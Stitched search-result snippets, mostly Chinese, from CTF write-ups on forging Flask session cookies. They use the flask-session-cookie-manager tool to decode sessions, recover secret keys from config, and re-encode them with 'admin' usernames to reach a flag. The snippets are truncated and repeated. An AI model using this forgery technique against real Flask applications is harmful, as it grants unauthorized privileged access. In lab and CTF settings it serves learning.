:cookie: Flask Session Cookie Decoder/Encoder. Contribute to noraj/flask-session-cookie-manager development by creating an account on GitHub.
首先先对当前的session进行解密,查看session的格式 python3 flask_session_cookie_manager3.py decode -c'eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDNMV1JoZEdFPSJ9fQ.Y48pCw.jSI45FJchx1e5pmIMuxPxvo4m9E'-s'210.13041538' 上面要求username=fuck 将www-data改为fuck进行伪造 修改session ,访问/flag得到flag [HCTF 20...
然后用脚本加密,(py flask_session_cookie_manager3.py encode -s 'ckj123' -t "{'_fresh': True, '_id': b'97ed7094d79efb078bfd797e58c8acd822f9e2e494d85c267d123e835dbe7e9d011756667aacd0721c52a5825728963ec35c3f018fa1304e5042b185d32f485a', 'csrf_token': b'807fe73d5bf88b80c790e80...
想到伪造session肯定需要key,突然想到可以去config里面寻找 得到key。woshicaiji别骂了,别骂了,F12寻找session 利用脚本解密得到是{'username': b'guest'}尝试修改为admin python flask_session_cookie_manager3.py encode -s "woshicaiji" -t "{'username': b'admin'}"...
在config.py中得到key,即ckj123 在index代码中发现 得到flag的关键信息 需要name == admin 我们将解密的session中的 'name': 'test' 修改为 'name': 'admin' 然后将session进行加密 加密 脚本使用如下脚本GitHub - noraj/flask-session-cookie-manager: Flask Session Cookie Decoder/Encoder ...
广大研究人员可以根据自己配置的Python环境来调用不同版本的脚本,即Python3对应flask_session_cookie_manager3.py,Python2环境对应flask_session_cookie_manager2.py: usage: flask_session_cookie_manager{2,3}.py [-h] {encode,decode} ... Flask Session Cookie Decoder/Encoder positional arguments: {encode,dec...
python flask_session_cookie_manager3.py decode-s"ican"-c"eyJ1c2VybmFtZSI6IjEifQ.Y7bNzg.k_DFbUcMkBDAZwZuKR2gvFuiQhc" 得到数据为{'username':'1'},猜测这里应该是想让我们修改为admin,因此修改1为admin,而后进行加密 代码语言:javascript ...
$ python3 flask_session_cookie_manager3.py encode -s 'hello world' -t '{"user":"admin"}' eyJ1c2VyIjoiYWRtaW4ifQ.Xzqkag.jq8cULYNeQYVZiH-2Fe3cAfECk4 替换后: ssti 老生常谈的问题,一直没总结,稍微写写。 先前对于ssti的理解不是很清晰,只会解一些稍简单的ssti,前段时间想出个flask的ssti...
脚本使用方法:解密:pythonflask_session_cookie_manager3.py decode -s "secret_key" -c "需要解密的session值"加密:python flask_session_cookie_manager3.py encode -s "secret_key" -t "需要加密的session值" 可以看到session已经解密为明文了,下面就让解密后的session值复制下来,让用户名改为admin就可以了,...
$ python3 flask_session_cookie_manager3.py encode -s 'hello world' -t '{"user":"admin"}'eyJ1c2VyIjoiYWRtaW4ifQ.Xzqkag.jq8cULYNeQYVZiH-2Fe3cAfECk4 1. 替换后: ssti 老生常谈的问题,一直没总结,稍微写写。 先前对于ssti的理解不是很清晰,只会解一些稍简单的ssti,前段时间想出个flask的...